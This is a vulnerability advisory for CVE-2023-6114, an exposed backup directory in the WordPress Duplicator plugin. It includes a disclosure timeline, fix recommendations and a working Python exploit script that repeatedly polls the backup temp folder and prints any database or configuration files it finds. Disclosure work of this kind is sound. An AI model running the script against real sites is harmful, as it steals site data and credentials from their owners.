In the security analysis of Duplicator, a critical vulnerability denoted as CVE-2023-6114 was identified. This issue revolves around the insecure use of Directory Listing, providing attackers with access to sensitive data and opening the door to Account Takeover.
Main info:
| CVE | CVE-2023-6114 |
| Plugin | Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 |
| Critical | Super High |
| All Time | 39 312 008 |
| Active installations | 1+ million |
| Publicly Published | December 4, 2023 |
| Last Updated | December 4, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6114 https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| November 10, 2023 | Plugin testing and vulnerability detection in the Duplicator plugin have been completed |
| November 10, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 15, 2023 | The author fixed the vulnerability and released the plugin update |
| November X, 2023 | Registered CVE-2023-6114 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory /wordpress/wp-content/backups-dup-lite/tmp/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Directory Listing / Account Takeover attack’s
Directory Listing is a technique where attackers can view the contents of a website’s directories. In the context of WordPress, this could mean access to confidential files, including Database, which is pivotal for database access and site management.
Real-world example: A hacker, leveraging Directory Listing, discovers and downloads password-containing files, granting them full control over the site.
Exploiting the Directory Listing Vulnerability
Malevolent actors, utilizing Directory Listing, can gain access to files containing passwords and other confidential data. Consequently, they can execute an Account Takeover, seizing control of the web resource. This opens doors to injecting malicious code, blocking access, and other critical actions.
POC:
1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time
2) Exploit will send file search requests every 5 seconds
3) I attack the site with this vulnerability using an exploit
Exploit sends a request to the server every 5 seconds along the path “http://your_site/wordpress/wp-content/backups-dup-lite/tmp/” and if it finds something in the index of, it instantly parses all the data and displays it on the screen
EXPLOIT (python3):
import requests from bs4 import BeautifulSoup import re import time url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" processed_files = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5)___
The risk involves not only the loss of confidential data but also reputation degradation, loss of control over content, and potential fraudulent activities. A real-world scenario is an attacker gaining access to Database, leading to the loss of vital data and site lockdown.
Recommendations for Improved Security
- Software Updates: Regularly update Duplicator and other WordPress components.
- Access Restriction: Regulate access rights to directories, especially those containing confidential files.
- Activity Monitoring: Utilize monitoring tools to track suspicious activity.
- Backups: Regularly backup data for swift recovery post incidents.
- Access Blocking: Implement tools that can automatically block access to directories upon detecting suspicious activity.
#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
